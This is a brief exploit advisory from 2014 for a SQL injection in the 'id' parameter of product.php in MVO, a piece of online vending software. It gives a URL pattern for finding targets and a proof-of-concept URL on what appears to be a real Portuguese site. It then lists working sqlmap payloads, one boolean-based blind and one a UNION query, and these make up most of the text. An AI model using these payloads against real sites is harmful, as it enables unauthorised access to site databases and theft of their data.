# SQL Injection on MVO ? - M?quina Vendas Online

# Risk: High

# CWE number: CWE-89

# Date: 13/10/2014

# Vendor: adnweb.es

# Author: Felipe " Renzi " Gabriel

# Contact: renzi@linuxmail.org

# Tested on:  Linux Mint ; Firefox ; Sqlmap 1.0-dev-nongit-20140906

# Vulnerable File: product.php

# Exploits: http://www.targXet.pt/product.php?id=[SQLI]


# PoC:      http://www.florXes.pt/product.php?id=31


--- "SQLI using SQLMAP."--- 
         
    Place: GET
    Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=31' AND 7612=7612 AND 'AUyP'='AUyP

    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: id=31' UNION ALL SELECT CONCAT    (0x7177687471,0x4c526646645746766575,0x717a616f71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

---


# Thank's